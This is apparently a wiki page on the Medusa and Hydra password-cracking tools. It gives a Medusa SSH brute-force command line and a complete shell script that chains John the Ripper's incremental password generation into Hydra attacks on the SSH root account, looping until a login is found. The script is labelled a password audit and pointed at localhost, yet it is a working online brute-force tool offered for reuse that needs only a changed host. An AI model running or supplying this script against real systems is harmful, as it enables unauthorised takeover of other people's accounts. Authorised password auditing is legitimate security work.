Medusa / Hydra: Difference between revisions

>Homaar
 
(No difference)

Latest revision as of 12:20, 10 December 2011

Medusa

Links

Libssh

Usage

../medusa -M ssh -H host.txt -U users.txt -p password

Hydra

Links

http://www.madirish.net/content/hydra-brute-force-utility

John + Hydra

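#!/bin/sh
#
# Password-audit loop: John the Ripper emits candidate passwords in
# incremental mode for a fixed time slice, then Hydra tries that batch as
# user "root" against the SSH service configured below. The loop repeats
# until the Hydra log contains a result line.
#
# Usage: <script> <john_session_name>
#   If "<john_session_name>.rec" exists the John session is restored,
#   otherwise a new session with that name is created.

hydra="/usr/local/bin/hydra"
john="/usr/bin/john"

hydra_module="ssh2"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
# Held as one string and expanded unquoted further down so that it splits
# into separate options (POSIX sh has no arrays).
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "

john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20   # time (seconds) to run john

if [ -z "$1" ]; then
	echo "Usage: $0 <john_session_name>"
	exit 0
fi

# Fail early instead of looping forever on an empty candidate list or log.
for tool in "$hydra" "$john"; do
	if [ ! -x "$tool" ]; then
		echo "$0: required tool not found or not executable: $tool" >&2
		exit 1
	fi
done

# The candidate list and the Hydra log (which records any recovered
# credential) must not live under fixed, world-readable names in /tmp:
# a predictable path can be pre-created or symlinked by another local user,
# and the contents would be readable by everyone on the host. Use a private
# directory that is removed on exit.
umask 077
work_dir=$(mktemp -d "${TMPDIR:-/tmp}/john-hydra.XXXXXX") || {
	echo "$0: cannot create private work directory" >&2
	exit 1
}
tmp_passwd="$work_dir/candidates"
hydra_logfile="$work_dir/hydralog"
john_pid=""

# Stop a still-running John job and delete the private work directory.
cleanup() {
	if [ -n "$john_pid" ]; then
		kill "$john_pid" 2>/dev/null
	fi
	rm -rf -- "${work_dir:?}"
}
trap cleanup EXIT
# Route signals through a normal exit so the EXIT trap also runs in shells
# that do not fire it on a signal.
trap 'exit 1' HUP INT TERM

while :; do
	# generate some passwords with john the ripper
	echo; echo "- Start (re)generating passwords with John"
	if [ -e "$john_sessionfile.rec" ]; then
		# session exists: restore it
		"$john" --restore="$john_sessionfile" > "$tmp_passwd" &
	else
		# no session yet: create it
		# shellcheck disable=SC2086 # word splitting of the option string is intended
		"$john" $john_all_params --session="$john_sessionfile" > "$tmp_passwd" &
	fi
	john_pid=$!

	# let john run for john_time_step seconds, then stop it
	echo "- Wait ..."
	sleep "$john_time_step"
	echo "- Kill john"
	# Signal only the job started above; "killall john" would also stop
	# unrelated John processes on the host.
	kill "$john_pid" 2>/dev/null
	# Reap the job so the candidate file is complete before Hydra reads it.
	wait "$john_pid" 2>/dev/null
	john_pid=""

	# start hydra
	echo; echo "- Start hydra"; echo

	rm -f -- "$hydra_logfile"
	echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
	# shellcheck disable=SC2086 # word splitting of the option string is intended
	"$hydra" -l root -P "$tmp_passwd" $hydra_all_params "$hydra_host" "$hydra_module" | tee -a "$hydra_logfile"

	# A log line that names the module and does not contain "DATA" is
	# treated as a found login; print it and stop the loop.
	found=$(grep -- "$hydra_module" "$hydra_logfile" | grep -v DATA)
	if [ -n "$found" ]; then
		echo; echo "FOUND !!"
		printf '%s\n' "$found"
		exit 0
	fi

done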